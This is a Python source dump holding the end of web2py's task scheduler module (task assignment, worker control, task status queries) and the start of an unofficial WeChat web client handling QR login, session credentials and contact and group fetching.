tasks') self.w_stats.errors += 1 db.rollback() time.sleep(0.5) def assign_tasks(self): """Assign task to workers, that can then pop them from the queue. 
Deals with group_name(s) logic, in order to assign linearly tasks to available workers for those groups """ now = self.now() db = self.db sw = db.scheduler_worker st = db.scheduler_task sd = db.scheduler_task_deps all_workers = db(sw.status == ACTIVE).select() # build workers as dict of groups wkgroups = {} for w in all_workers: if w.worker_stats['status'] == 'RUNNING': continue group_names = w.group_names for gname in group_names: if gname not in wkgroups: wkgroups[gname] = dict( workers=[{'name': w.worker_name, 'c': 0}]) else: wkgroups[gname]['workers'].append( {'name': w.worker_name, 'c': 0}) # set queued tasks that expired between "runs" (i.e., you turned off # the scheduler): then it wasn't expired, but now it is db( (st.status.belongs((QUEUED, ASSIGNED))) & (st.stop_time < now) ).update(status=EXPIRED) # calculate dependencies deps_with_no_deps = db( (sd.can_visit == False) & (~sd.task_child.belongs( db(sd.can_visit == False)._select(sd.task_parent) ) ) )._select(sd.task_child) no_deps = db( (st.status.belongs((QUEUED, ASSIGNED))) & ( (sd.id == None) | (st.id.belongs(deps_with_no_deps)) ) )._select(st.id, distinct=True, left=sd.on( (st.id == sd.task_parent) & (sd.can_visit == False) ) ) all_available = db( (st.status.belongs((QUEUED, ASSIGNED))) & (st.next_run_time <= now) & (st.enabled == True) & (st.id.belongs(no_deps)) ) limit = len(all_workers) * (50 / (len(wkgroups) or 1)) # if there are a moltitude of tasks, let's figure out a maximum of # tasks per worker. This can be further tuned with some added # intelligence (like esteeming how many tasks will a worker complete # before the ticker reassign them around, but the gain is quite small # 50 is a sweet spot also for fast tasks, with sane heartbeat values # NB: ticker reassign tasks every 5 cycles, so if a worker completes # its 50 tasks in less than heartbeat*5 seconds, # it won't pick new tasks until heartbeat*5 seconds pass. 
# If a worker is currently elaborating a long task, its tasks needs to # be reassigned to other workers # this shuffles up things a bit, in order to give a task equal chances # to be executed # let's freeze it up db.commit() tnum = 0 for group in wkgroups.keys(): tasks = all_available(st.group_name == group).select( limitby=(0, limit), orderby=st.next_run_time) # let's break up the queue evenly among workers for task in tasks: tnum += 1 gname = task.group_name ws = wkgroups.get(gname) if ws: if task.broadcast: for worker in ws['workers']: new_task = db.scheduler_task.insert( application_name=task.application_name, task_name=task.task_name, group_name=task.group_name, status=ASSIGNED, broadcast=False, function_name=task.function_name, args=task.args, start_time=now, repeats=1, retry_failed=task.retry_failed, sync_output=task.sync_output, assigned_worker_name=worker['name']) if task.period: next_run_time = now + datetime.timedelta(seconds=task.period) else: # must be cronline cron_recur = CronParser(task.cronline, now.replace(second=0, microsecond=0)) next_run_time = cron_recur.next() db(st.id == task.id).update(times_run=task.times_run + 1, next_run_time=next_run_time, last_run_time=now) db.commit() else: counter = 0 myw = 0 for i, w in enumerate(ws['workers']): if w['c'] < counter: myw = i counter = w['c'] assigned_wn = wkgroups[gname]['workers'][myw]['name'] d = dict( status=ASSIGNED, assigned_worker_name=assigned_wn ) db( (st.id == task.id) & (st.status.belongs((QUEUED, ASSIGNED))) ).update(**d) wkgroups[gname]['workers'][myw]['c'] += 1 db.commit() # I didn't report tasks but I'm working nonetheless!!!! 
with self.w_stats_lock: if tnum > 0: self.w_stats.empty_runs = 0 self.w_stats.queue = tnum self.w_stats.distribution = wkgroups self.w_stats.workers = len(all_workers) # I'll be greedy only if tasks assigned are equal to the limit # (meaning there could be others ready to be assigned) self.greedy = tnum >= limit logger.info('TICKER: workers are %s', len(all_workers)) logger.info('TICKER: tasks are %s', tnum) def sleep(self): """Calculate the number of seconds to sleep.""" time.sleep(self.w_stats.sleep) # should only sleep until next available task def set_worker_status(self, group_names=None, action=ACTIVE, exclude=None, limit=None, worker_name=None): """Internal function to set worker's status.""" db = self.db ws = db.scheduler_worker if not group_names: group_names = self.group_names elif isinstance(group_names, str): group_names = [group_names] if worker_name: db(ws.worker_name == worker_name).update(status=action) return exclusion = exclude and exclude.append(action) or [action] if not limit: for group in group_names: db( (ws.group_names.contains(group)) & (~ws.status.belongs(exclusion)) ).update(status=action) else: for group in group_names: workers = db((ws.group_names.contains(group)) & (~ws.status.belongs(exclusion)) )._select(ws.id, limitby=(0, limit)) db(ws.id.belongs(workers)).update(status=action) def disable(self, group_names=None, limit=None, worker_name=None): """Set DISABLED on the workers processing `group_names` tasks. A DISABLED worker will be kept alive but it won't be able to process any waiting tasks, essentially putting it to sleep. 
By default, all group_names of Scheduler's instantation are selected """ self.set_worker_status( group_names=group_names, action=DISABLED, exclude=[DISABLED, KILL, TERMINATE], limit=limit) def resume(self, group_names=None, limit=None, worker_name=None): """Wakes a worker up (it will be able to process queued tasks)""" self.set_worker_status( group_names=group_names, action=ACTIVE, exclude=[KILL, TERMINATE], limit=limit) def terminate(self, group_names=None, limit=None, worker_name=None): """Sets TERMINATE as worker status. The worker will wait for any currently running tasks to be executed and then it will exit gracefully """ self.set_worker_status( group_names=group_names, action=TERMINATE, exclude=[KILL], limit=limit) def kill(self, group_names=None, limit=None, worker_name=None): """Sets KILL as worker status. The worker will be killed even if it's processing a task.""" self.set_worker_status( group_names=group_names, action=KILL, limit=limit) def queue_task(self, function, pargs=[], pvars={}, **kwargs): """ Queue tasks. This takes care of handling the validation of all parameters Args: function: the function (anything callable with a __name__) pargs: "raw" args to be passed to the function. Automatically jsonified. pvars: "raw" kwargs to be passed to the function. Automatically jsonified kwargs: all the parameters available (basically, every `scheduler_task` column). If args and vars are here, they should be jsonified already, and they will override pargs and pvars Returns: a dict just as a normal validate_and_insert(), plus a uuid key holding the uuid of the queued task. If validation is not passed ( i.e. some parameters are invalid) both id and uuid will be None, and you'll get an "error" dict holding the errors found. 
""" if hasattr(function, '__name__'): function = function.__name__ targs = 'args' in kwargs and kwargs.pop('args') or dumps(pargs) tvars = 'vars' in kwargs and kwargs.pop('vars') or dumps(pvars) tuuid = 'uuid' in kwargs and kwargs.pop('uuid') or web2py_uuid() tname = 'task_name' in kwargs and kwargs.pop('task_name') or function immediate = 'immediate' in kwargs and kwargs.pop('immediate') or None cronline = kwargs.get('cronline') kwargs.update( function_name=function, task_name=tname, args=targs, vars=tvars, uuid=tuuid, ) if cronline: try: start_time = kwargs.get('start_time', self.now) next_run_time = CronParser(cronline, start_time).next() kwargs.update(start_time=start_time, next_run_time=next_run_time) except Exception: pass if 'start_time' in kwargs and 'next_run_time' not in kwargs: kwargs.update(next_run_time=kwargs['start_time']) db = self.db rtn = db.scheduler_task.validate_and_insert(**kwargs) if not rtn.errors: rtn.uuid = tuuid if immediate: db( (db.scheduler_worker.is_ticker == True) ).update(status=PICK) else: rtn.uuid = None return rtn def task_status(self, ref, output=False): """ Retrieves task status and optionally the result of the task Args: ref: can be - an integer : lookup will be done by scheduler_task.id - a string : lookup will be done by scheduler_task.uuid - a `Query` : lookup as you wish, e.g. :: db.scheduler_task.task_name == 'test1' output(bool): if `True`, fetch also the scheduler_run record Returns: a single Row object, for the last queued task. If output == True, returns also the last scheduler_run record. 
        The scheduler_run record is fetched by a left join, so it can
        have all fields == None
        """
        from pydal.objects import Query
        db = self.db
        sr = db.scheduler_run
        st = db.scheduler_task
        # Build the lookup query from whatever kind of reference was given.
        if isinstance(ref, integer_types):
            q = st.id == ref
        elif isinstance(ref, str):
            q = st.uuid == ref
        elif isinstance(ref, Query):
            q = ref
        else:
            raise SyntaxError(
                "You can retrieve results only by id, uuid or Query")
        fields = [st.ALL]
        left = False
        orderby = ~st.id
        if output:
            # also pull the latest matching run record (left join, so all of
            # its fields may be None when the task never ran)
            fields = st.ALL, sr.ALL
            left = sr.on(sr.task_id == st.id)
            orderby = ~st.id | ~sr.id
        row = db(q).select(
            *fields, **dict(orderby=orderby, left=left, limitby=(0, 1))
        ).first()
        if row and output:
            # decode the stored JSON result (if any) into row.result
            row.result = row.scheduler_run.run_result and \
                loads(row.scheduler_run.run_result,
                      object_hook=_decode_dict) or None
        return row

    def stop_task(self, ref):
        """Shortcut for task termination.

        If the task is RUNNING it will terminate it, meaning that status
        will be set as FAILED.

        If the task is QUEUED, its stop_time will be set as to "now",
            the enabled flag will be set to False, and the status
            to STOPPED

        Args:
            ref: can be
                - an integer : lookup will be done by scheduler_task.id
                - a string : lookup will be done by scheduler_task.uuid

        Returns:
            - 1 if task was stopped (meaning an update has been done)
            - None if task was not found, or if task was not RUNNING
                or QUEUED

        Note:
            Experimental
        """
        db = self.db
        st = db.scheduler_task
        sw = db.scheduler_worker
        if isinstance(ref, integer_types):
            q = st.id == ref
        elif isinstance(ref, str):
            q = st.uuid == ref
        else:
            raise SyntaxError(
                "You can retrieve results only by id or uuid")
        task = db(q).select(st.id, st.status, st.assigned_worker_name)
        task = task.first()
        rtn = None
        if not task:
            return rtn
        if task.status == 'RUNNING':
            # ask the worker currently holding the task to stop it
            q = sw.worker_name == task.assigned_worker_name
            rtn = db(q).update(status=STOP_TASK)
        elif task.status == 'QUEUED':
            # here q is still the scheduler_task query built above
            rtn = db(q).update(
                stop_time=self.now(),
                enabled=False,
                status=STOPPED)
        return rtn

    def get_workers(self, only_ticker=False):
        """
        Returns a dict holding `worker_name :
{**columns}` representing all "registered" workers only_ticker returns only the workers running as a TICKER, if there are any """ db = self.db if only_ticker: workers = db(db.scheduler_worker.is_ticker == True).select() else: workers = db(db.scheduler_worker.id).select() all_workers = {} for row in workers: all_workers[row.worker_name] = Storage( status=row.status, first_heartbeat=row.first_heartbeat, last_heartbeat=row.last_heartbeat, group_names=row.group_names, is_ticker=row.is_ticker, worker_stats=row.worker_stats ) return all_workers def main(): """ allows to run worker without python web2py.py .... by simply:: python gluon/scheduler.py """ import optparse parser = optparse.OptionParser() parser.add_option( "-w", "--worker_name", dest="worker_name", default=None, help="start a worker with name") parser.add_option( "-b", "--heartbeat", dest="heartbeat", default=10, type='int', help="heartbeat time in seconds (default 10)") parser.add_option( "-L", "--logger_level", dest="logger_level", default=30, type='int', help="set debug output level (0-100, 0 means all, 100 means none;default is 30)") parser.add_option("-E", "--empty-runs", dest="max_empty_runs", type='int', default=0, help="max loops with no grabbed tasks permitted (0 for never check)") parser.add_option( "-g", "--group_names", dest="group_names", default='main', help="comma separated list of groups to be picked by the worker") parser.add_option( "-f", "--db_folder", dest="db_folder", default='/Users/mdipierro/web2py/applications/scheduler/databases', help="location of the dal database folder") parser.add_option( "-u", "--db_uri", dest="db_uri", default='sqlite://storage.sqlite', help="database URI string (web2py DAL syntax)") parser.add_option( "-t", "--tasks", dest="tasks", default=None, help="file containing task files, must define" + "tasks = {'task_name':(lambda: 'output')} or similar set of tasks") parser.add_option( "-U", "--utc-time", dest="utc_time", default=False, help="work with UTC timestamps" 
) (options, args) = parser.parse_args() if not options.tasks or not options.db_uri: print(USAGE) if options.tasks: path, filename = os.path.split(options.tasks) if filename.endswith('.py'): filename = filename[:-3] sys.path.append(path) print('importing tasks...') tasks = __import__(filename, globals(), locals(), [], -1).tasks print('tasks found: ' + ', '.join(list(tasks.keys()))) else: tasks = {} group_names = [x.strip() for x in options.group_names.split(',')] logging.getLogger().setLevel(options.logger_level) print('groups for this worker: ' + ', '.join(group_names)) print('connecting to database in folder: ' + options.db_folder or './') print('using URI: ' + options.db_uri) db = DAL(options.db_uri, folder=options.db_folder, decode_credentials=True) print('instantiating scheduler...') scheduler = Scheduler(db=db, worker_name=options.worker_name, tasks=tasks, migrate=True, group_names=group_names, heartbeat=options.heartbeat, max_empty_runs=options.max_empty_runs, utc_time=options.utc_time) signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1)) print('starting main worker loop...') scheduler.loop() if __name__ == '__main__': main()
# ==== wechat.py ====
# -*- coding: utf-8 -*- import os import io import re import json import time import random import asyncio import logging import hashlib import unittest import functools import threading import mimetypes import concurrent.futures from pprint import pprint from urllib.parse import urlparse, unquote from collections import OrderedDict import aiohttp import requests import async_timeout from lxml import etree from pyqrcode import QRCode from requests.utils import cookiejar_from_dict def set_logger(name, level=logging.INFO): formatter = logging.Formatter('[%(levelname)1.1s %(asctime)s ' '%(module)s:%(lineno)d] %(message)s') stream_handler = logging.StreamHandler() stream_handler.formatter = formatter _logger = logging.getLogger(name) _logger.addHandler(stream_handler) _logger.setLevel(level) return _logger logger = set_logger('wechat') class NamedVKDict(object): """ usage: >>> country = NamedVKDict({'CHINA': 0, 'AMERICA': 1, 'BRITAIN': 2}) >>> country.CHINA >>> 0 >>> country[0] >>> 'CHINA' """ def __init__(self, value): self._attr = value self._index = {v: k for k, v in value.items()} def __getattr__(self, value): if value in self._attr: return self._attr[value] else: raise AttributeError def __getitem__(self, value): return self._index[value] def fix_emoji(val): """ _emoji_debugger is for bugs about emoji match caused by wechat backstage like :face with tears of joy: will be replaced with :cat face with tears of joy: """ def _emoji_debugger(val): s = val.replace('<span class="emoji emoji1f450"></span', '<span class="emoji emoji1f450"></span>') def __fix_miss_match(m): return '<span class="emoji emoji%s"></span>' % ({ '1f63c': '1f601', '1f639': '1f602', '1f63a': '1f603', '1f4ab': '1f616', '1f64d': '1f614', '1f63b': '1f60d', '1f63d': '1f618', '1f64e': '1f621', '1f63f': '1f622', }.get(m.group(1), m.group(1))) return WeChatMeta.RE['emoji'].sub(__fix_miss_match, s) def _emoji_formatter(m): s = m.group(1) if len(s) == 6: return ('\\U%s\\U%s'%(s[:2].rjust(8, '0'), 
s[2:].rjust(8, '0')))\ .encode('utf8').decode('unicode-escape', 'replace') elif len(s) == 10: return ('\\U%s\\U%s'%(s[:5].rjust(8, '0'), s[5:].rjust(8, '0')))\ .encode('utf8').decode('unicode-escape', 'replace') else: return ('\\U%s'%m.group(1).rjust(8, '0'))\ .encode('utf8').decode('unicode-escape', 'replace') val = _emoji_debugger(val) val = WeChatMeta.RE['emoji'].sub(_emoji_formatter, val) return val ############## # Exceptions # ############## class WeChatError(Exception): pass class LoginFailedError(WeChatError): pass class MultiListenThreadError(WeChatError): pass class MessageDataCorruptionError(WeChatError): pass class WeChatMeta(object): APP_ID = 'wx782c26e4c19acffb' # Got from itChat GROUP_PREFIX = '@@' INVITE_BY_MYSELF = '你' MP_FLAG = 'gh_' COOKIE_DOMAIN = '.qq.com' TIME_FORMAT = '%a %b %d %Y %H:%M:%S GMT+0800 (CST)' FILE_MESSAGE_TEMPLATE = ( "<appmsg appid='{}' sdkver=''><title>{}</title><des></des><action>" "</action><type>6</type><content></content><url></url><lowurl>" "</lowurl><appattach><totallen>{}</totallen><attachid>{}</attachid>" "<fileext>{}</fileext></appattach><extinfo></extinfo></appmsg>" ) LOGIN_URI = 'https://login.weixin.qq.com' URL = { 'uuid': LOGIN_URI + '/jslogin', 'push_login': LOGIN_URI + '/cgi-bin/mmwebwx-bin/webwxpushloginurl', 'login_status': LOGIN_URI + '/cgi-bin/mmwebwx-bin/login', 'qr_code': LOGIN_URI + '/l/', 'upload_media': '/webwxuploadmedia', 'sync_check': '/synccheck', 'web_sync': '/webwxsync', 'web_init': '/webwxinit', 'web_status': '/webwxstatusnotify', 'get_contacts': '/webwxgetcontact', 'bget_contacts': '/webwxbatchgetcontact', 'send_message': '/webwxsendmsg', 'send_image': '/webwxsendmsgimg', 'send_video': '/webwxsendvideomsg', 'send_file': '/webwxsendappmsg', 'update_group': '/webwxupdatechatroom', 'create_group': '/webwxcreatechatroom', 'set_pin': '/webwxoplog', 'group_avatar': '/webwxgetheadimg', 'user_avatar': '/webwxgeticon', } RE = { 'uuid': re.compile(r'QRLogin\.uuid = "(?P<uuid>\S+)"'), 'login_status': 
re.compile(r'window\.code=(?P<status>\d+)'), 'main_uri': re.compile(r'window.redirect_uri="(?P<main_uri>\S+)"'), 'uin': re.compile(r'<username>(?P<uin>[^<]*?)<'), 'sync_check': re.compile(r'synccheck=\{retcode:"(?P<retcode>\d+)",' r'selector:"(?P<selector>\d+)"\}'), 'group_msg': re.compile(u'(?P<username>@[0-9a-z]+):<br/>' u'(@(?P<nickname>.*?)\u2005)?' u'(?P<content>.*)'), 'invite': re.compile('.*?(邀请"(?P<invitee1>.*?)"|' '"(?P<invitee2>.*?)"通过)'), 'remove': re.compile('"(?P<nickname>.*?)"移出了群聊'), 'emoji': re.compile(r'<span class="emoji emoji(.{1,10})"></span>'), } MESSAGE_TYPE = NamedVKDict({ 'TEXT': 1, 'IMAGE': 3, 'FILE': 6, 'CONTACT_CARD': 42, 'VIDEO': 43, 'SHARE': 49, 'INITIALIZE': 51, 'SYSTEM': 10000, }) class Contact(object): RAW_FIELD = ['UserName', 'NickName', 'MemberList', 'DisplayName'] def __init__(self, raw_contact=None, account=None, is_group=False, dumps=None): self.__bool = False or bool(raw_contact) if dumps or not self.__bool: return member_list = raw_contact.get('MemberList', []) self.account = account self.user_id = raw_contact['UserName'] self.nickname = fix_emoji(raw_contact['NickName']) self.display_name = fix_emoji(raw_contact.get('DisplayName', '')) self.is_owner = self._is_owner(member_list) self.members = self.process_members(member_list) self.is_group = is_group @property def avatar(self): return self.account.get_avatar(self.user_id) def process_members(self, members): return {m['UserName']: Contact(m, self.account) for m in members} def _is_owner(self, members): if not members: return False return members[0]['UserName'] == self.account.username @classmethod def is_data_corruption(cls, raw_contact): if not raw_contact: return True for field in cls.RAW_FIELD: if field not in raw_contact: return True return True def dump(self, avatar=False): contact = { 'user_id': self.user_id, 'nickname': self.nickname, 'display_name': self.display_name, 'is_owner': self.is_owner, 'is_group': self.is_group, 'members': { user_id: member.dump(avatar) for 
user_id, member in self.members.items() }, 'account': { 'username': self.account.username, 'nickname': self.account.nickname, 'uin': self.account.uin, }, } if avatar: avatar_bin = self.account.get_avatar(self.user_id) contact['avatar_md5'] = hashlib.md5(avatar_bin).hexdigest() return contact @classmethod def load(cls, dump, account=None): if not isinstance(dump, dict): contact = json.loads(dump) contact = cls(dumps=True) contact.account = account contact.user_id = dump['user_id'] contact.nickname = dump['nickname'] contact.display_name = dump['display_name'] contact.is_owner = dump['is_owner'] contact.is_group = dump['is_group'] contact.members = { user_id: cls.load(member, account) for user_id, member in dump['members'].items() } return contact def __bool__(self): return self.__bool class WeChatClient(object): HEADERS = { 'ContentType': 'application/json; charset=UTF-8', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) ' 'AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/58.0.3029.110 Safari/537.36', } CHUNK_SIZE = 1024 * 512 # 512KB def __init__(self, credential=None): self.login = False self._alive = False self.uuid = None self.login_info = {} self.invite_start_count = 40 self.session = requests.Session() self.session.headers = self.HEADERS self.friends = {} self.groups = {} self.mp = {} self.logout_callback = [] self.message_callback = {} self.credential_update_callback = [] self.group_update_callback = {} self.tick_hooks = {} self.uin = None self.username = None self.nickname = None self.alias = None self._listen_thread = None self.listening = False if credential: self.load_credential(credential) @property def alive(self): return bool(self._alive and self.listen_thread and self.listen_thread.isAlive()) @property def listen_thread(self): return self._listen_thread @listen_thread.setter def listen_thread(self, value): if self.listen_thread and self.listen_thread.isAlive(): raise MultiListenThreadError self._listen_thread = value ################## # 
login & logout #
    ##################
    def login_by_qrcode(self, timeout=180, thread=False, callback=None):
        """Poll QR-scan login status for up to `timeout` seconds.

        With thread=True the polling runs in a daemon thread and this
        returns None immediately; otherwise it blocks and returns the
        final self.login flag. `callback` is invoked with no arguments
        once login succeeds.
        """
        def polling():
            start_time = time.time()
            while not self.login:
                if time.time() - start_time > timeout:
                    return self.login
                self.login = self._polling_login()
                time.sleep(0.1)
            self._login_init()
            self._alive = True
            if callback:
                # _run_callback calls it with no positional arguments.
                self._run_callback([callback])
            self.listen_message()
            return self.login

        if not thread:
            return polling()
        polling_thread = threading.Thread(target=polling)
        polling_thread.setDaemon(True)
        polling_thread.start()

    def print_cli_qrcode(self):
        # Render the login QR in the terminal; also writes uca-url.svg
        # to the current working directory as a side effect.
        self.uuid = self.get_login_uuid()
        qr_code = QRCode(WeChatMeta.URL['qr_code'] + self.uuid)
        qr_code.svg('uca-url.svg', scale=6)
        print(qr_code.terminal(quiet_zone=1))

    @classmethod
    def get_login_uuid(cls):
        """Request a fresh login uuid from the jslogin endpoint."""
        resp = requests.get(
            WeChatMeta.URL['uuid'],
            params={'appid': WeChatMeta.APP_ID, 'fun': 'new'}
        )
        result = WeChatMeta.RE['uuid'].search(resp.text)
        assert result, 'Failed get uuid from {}'.format(WeChatMeta.URL['uuid'])
        return result.group('uuid')

    @classmethod
    def generate_qrcode(cls, uuid):
        """Return the login QR code for `uuid` as SVG bytes."""
        qr_storage = io.BytesIO()
        qr_code = QRCode(WeChatMeta.URL['qr_code'] + uuid)
        qr_code.svg(qr_storage, scale=10)
        return qr_storage.getvalue()

    def get_qrcode(self):
        # Allocate a new uuid and return its QR code (SVG bytes).
        self.uuid = self.get_login_uuid()
        return self.generate_qrcode(self.uuid)

    def _polling_login(self):
        """One status poll; True once the phone confirmed the login."""
        if not self.uuid:
            return False
        timestamp = int(time.time())
        params = {
            'uuid': self.uuid,
            'loginicon': True,
            'tip': 0,
            # NOTE(review): true division yields a float on Python 3;
            # the reference client (ItChat) sends an int — confirm the
            # server tolerates the float form.
            'r': timestamp / 1579,  # Magic number: 1579, from ItChat
            '_': timestamp
        }
        resp = self.session.get(WeChatMeta.URL['login_status'], params=params)
        result = WeChatMeta.RE['login_status'].search(resp.text)
        if not result:
            return False
        status = result.group('status')
        if status != '200':
            return False
        else:
            # 200 = scan confirmed; the body carries the redirect uri.
            self._extract_login_credential(resp.text)
            return True

    def _extract_login_credential(self, content):
        """Follow the post-scan redirect and harvest session credentials.

        Populates self.login_info (skey/wxsid/wxuin/pass_ticket, derived
        service URIs, a random deviceid) and raises LoginFailedError when
        the response cannot be parsed.
        """
        result = WeChatMeta.RE['main_uri'].search(content)
        if not result:
            raise LoginFailedError('Failed extract redirect uri '
                                   'after login success')
        redirect_uri = result.group('main_uri')
        resp = self.session.get(redirect_uri, allow_redirects=False)
        credit = self.login_info
        resp_xml = etree.fromstring(resp.text)
        parsed_uri = urlparse(redirect_uri)
        # scheme/host/base-path triple reused for the sibling services.
        essentials = (parsed_uri.scheme, parsed_uri.netloc,
                      parsed_uri.path[:parsed_uri.path.rfind('/')])
        credit['main_uri'] = '{}://{}{}'.format(*essentials)
        credit['upload_uri'] = '{}://file.{}{}'.format(*essentials)
        credit['web_sync_uri'] = '{}://webpush.{}{}'.format(*essentials)
        # 15 random digits with an 'e' prefix, as the web client does.
        credit['deviceid'] = 'e' + repr(random.random())[2:17]
        try:
            br = credit['base_request'] = {'DeviceID': credit['deviceid']}
            credit['skey'] = br['Skey'] = resp_xml.xpath('//skey')[0].text
            credit['wxsid'] = br['Sid'] = resp_xml.xpath('//wxsid')[0].text
            credit['wxuin'] = resp_xml.xpath('//wxuin')[0].text
            br['Uin'] = int(credit['wxuin'])
            credit['pass_ticket'] = unquote(
                resp_xml.xpath('//pass_ticket')[0].text
            )
            self.uin = credit['wxuin']
        except TypeError:
            # Missing xpath text -> .text is None -> TypeError downstream.
            self.login_info = {}
            raise LoginFailedError(
                'Failed extract login credential from login xml'
            )

    def _web_init(self):
        """webwxinit: fetch SyncKey and own profile; persist credential."""
        url = self.login_info['main_uri'] + WeChatMeta.URL['web_init']
        resp = self.session.post(
            url,
            params={'r': int(time.time())},
            json={'BaseRequest': self.login_info['base_request']}
        )
        result = self._decode_content(resp.content)
        credit = self.login_info
        credit['sync_check_key'] = result['SyncKey']
        self.username = fix_emoji(result['User']['UserName'])
        self.nickname = fix_emoji(result['User']['NickName'])
        self.invite_start_count = int(result['InviteStartCount'])
        self.save_credential()

    def _get_initialize_contacts(self):
        """webwxstatusnotify: report client init; True on Ret == 0."""
        url = self.login_info['main_uri'] + WeChatMeta.URL['web_status']
        params = {
            'lang': 'zh_CN',
            'pass_ticket': self.login_info['pass_ticket'],
        }
        data = {
            'BaseRequest': self.login_info['base_request'],
            'Code': 3,
            'FromUserName': self.username,
            'ToUserName': self.username,
            'ClientMsgId': int(time.time()),
        }
        resp = self.session.post(url, params=params, json=data)
        return resp.json()['BaseResponse']['Ret'] == 0

    def _get_all_contacts(self):
        url =
self.login_info['main_uri'] + WeChatMeta.URL['get_contacts'] def fetch_fragment(seq=0): contacts = [] params = { 'r': int(time.time()), 'seq': seq, 'skey': self.login_info['skey'], } resp = self.session.get(url, params=params) data = self._decode_content(resp.content) contacts.extend(data.get('MemberList', [])) new_seq = data.get('Seq', 0) if new_seq != 0: contacts.extend(fetch_fragment(new_seq)) else: return contacts all_contacts = fetch_fragment() self._process_contacts_change(all_contacts) def _login_init(self): self._web_init() self._get_initialize_contacts() self._get_all_contacts() def export_credential(self): return { 'cookies': self.session.cookies.get_dict(), 'login_info': self.login_info, 'username': self.username, 'nickname': self.nickname, 'uin': self.uin, } def load_credential(self, credential): self.login_info = credential['login_info'] self.session.cookies = cookiejar_from_dict(credential['cookies']) self.uin = self.login_info['wxuin'] self.nickname = credential['nickname'] self.username = credential['username'] def login_by_credential(self, credential=None): if credential: self.load_credential(credential) cookies = self.session.cookies.get_dict() cookies.update({ 'login_frequency': '2', 'last_wxuin': self.login_info['wxuin'], 'MM_WX_NOTIFY_STATE': '1', 'MM_WX_SOUND_STATE': '1', }) self.session.cookies = cookiejar_from_dict(cookies) success, message, contacts = self._fetch_server_change() if success: self.login = True self._alive = True self._login_init() self.listen_message() return True else: return False def _push_login(self): uin = self.login_info['wxuin'] resp = self.session.get(WeChatMeta.URL['push_login'], params={'uin': uin}) result = resp.json() if 'uuid' in result and str(result.get('ret')) == '0': self.uuid = result['uuid'] return True else: return False def logout(self): self._alive = False self.login = False old_listen_thread = self._listen_thread del old_listen_thread self._listen_thread = None for cb in self.logout_callback: cb(self) 
    #################
    # Contacts data #
    #################
    def save_group(self, group):
        """Cache `group` and fire group-update callbacks (no-op on falsy)."""
        if not group:
            return
        self._run_callback(self.group_update_callback, group)
        self.groups[group.user_id] = group

    def get_group_by_username(self, username, force_remote=False):
        # Serve from cache unless missing or a remote refresh is forced.
        if force_remote or username not in self.groups:
            group = self._query_entity(username)
            if not group:
                return None
            self.save_group(group)
        return self.groups[username]

    def get_group_by_nickname(self, nickname):
        # Linear scan of the cache; returns None when nothing matches.
        for group_id, group in self.groups.items():
            if group.nickname == nickname:
                return group

    def get_group_member(self, group_id, user_id):
        """Return the member Contact, or None if group/member unknown."""
        group = self.get_group_by_username(group_id)
        if not group:
            return None
        return group.members.get(user_id)

    @classmethod
    def _process_fetch(cls, session, req):
        # Pool worker: POST one batch request and decode the JSON body.
        return cls._decode_content(session.post(**req).content)

    def _build_username_req(self, user_ids, group_id):
        """Build one webwxbatchgetcontact request for `user_ids`.

        `group_id` scopes the lookup to a chat room (EncryChatRoomId).
        """
        if not group_id:
            request_list = [
                {'UserName': user, 'EncryChatRoomId': ''}
                for user in user_ids
            ]
        else:
            request_list = [
                {'UserName': user, 'EncryChatRoomId': group_id}
                for user in user_ids
            ]
        return {
            'url': self.login_info['main_uri'] +
                   WeChatMeta.URL['bget_contacts'],
            'params': {'type': 'ex', 'r': int(time.time())},
            'data': json.dumps({
                'BaseRequest': self.login_info['base_request'],
                'Count': len(user_ids),
                'List': request_list,
            })
        }

    def _query_entity(self, username):
        # Single-entity convenience wrapper; {} when nothing was found.
        result = self._query_entities([username])
        return result[0] if result else {}

    def _query_entities(self, user_ids):
        """Batch-fetch contact/group details, then each group's members.

        HTTP fan-out runs in a process pool; an asyncio variant exists
        below but is currently unused (see FIXME).
        """
        try:
            loop = asyncio.get_event_loop()
        except RuntimeError:
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)

        def package_req(items, group_id=None):
            # Split into batches of 50 (server-side limit).
            # NOTE(review): len(items) % 50 == 0 yields one empty trailing
            # batch — appears harmless but wasteful; confirm before fixing.
            reqs = []
            for i in range(len(items)//50 + 1):
                seg = items[i*50: (i+1) * 50]
                reqs.append(self._build_username_req(seg, group_id))
            return reqs

        def do_request(reqs, groups=None):
            # Fan out via worker processes; when `groups` is given, pair
            # each response with its originating group id.
            with concurrent.futures.ProcessPoolExecutor() as executor:
                result = list(executor.map(
                    self._process_fetch,
                    [self.session] * len(reqs), reqs)
                )
            return zip(result, groups) if groups else result

        # FIXME: async request work not meeting expectations
        async def _fetch(req):
            cookies = self.session.cookies.get_dict()
            try:
                with async_timeout.timeout(100):
                    async with aiohttp.ClientSession(
                            loop=loop, cookies=cookies,
                            headers=self.HEADERS) as session:
                        async with session.post(**req) as res:
                            res = await res.text(encoding='utf-8')
                            return json.loads(res)
            except asyncio.TimeoutError as err:
                logger.error('Failed get req: {} response, '
                             'err: {}'.format(req, err))
            except Exception as err:
                logger.error('*** Terrible things happened ***, '
                             'error: {}'.format(err))

        def do_async_request(reqs, groups=None):
            # Unused asyncio alternative to do_request (see FIXME above).
            futures = [_fetch(r) for r in reqs]
            result = loop.run_until_complete(asyncio.gather(*futures))
            return zip(result, groups) if groups else result

        # First pass: the entities themselves.
        resp = do_request(package_req(user_ids))
        entities = [g for r in resp if resp
                    for g in r.get('ContactList') if g]
        entities = {g['UserName']: Contact(g, self, True) for g in entities}
        if not entities:
            logger.error('Aysnc request failed: raw resp: {}'.format(resp))
        # Second pass: member details per group, batched per group id.
        req_queue = []
        group_queue = []
        for group_id, group in entities.items():
            members = list(group.members.keys())
            sub_req = package_req(members, group_id)
            req_queue.extend(sub_req)
            group_queue.extend([group_id] * len(sub_req))
            group.members = {}
        if not req_queue:
            return list(entities.values())
        resp = do_request(req_queue, group_queue)
        for member, group_id in resp:
            group = entities[group_id]
            if member:
                for m in member['ContactList']:
                    m = Contact(m, self)
                    group.members[m.user_id] = m
        return list(entities.values())

    def _process_contacts_change(self, contacts):
        """Route raw contact dicts into the mp / groups / friends caches."""
        for contact in contacts:
            user = contact['UserName']
            if contact.get('KeyWord') == WeChatMeta.MP_FLAG:
                self.mp[user] = contact
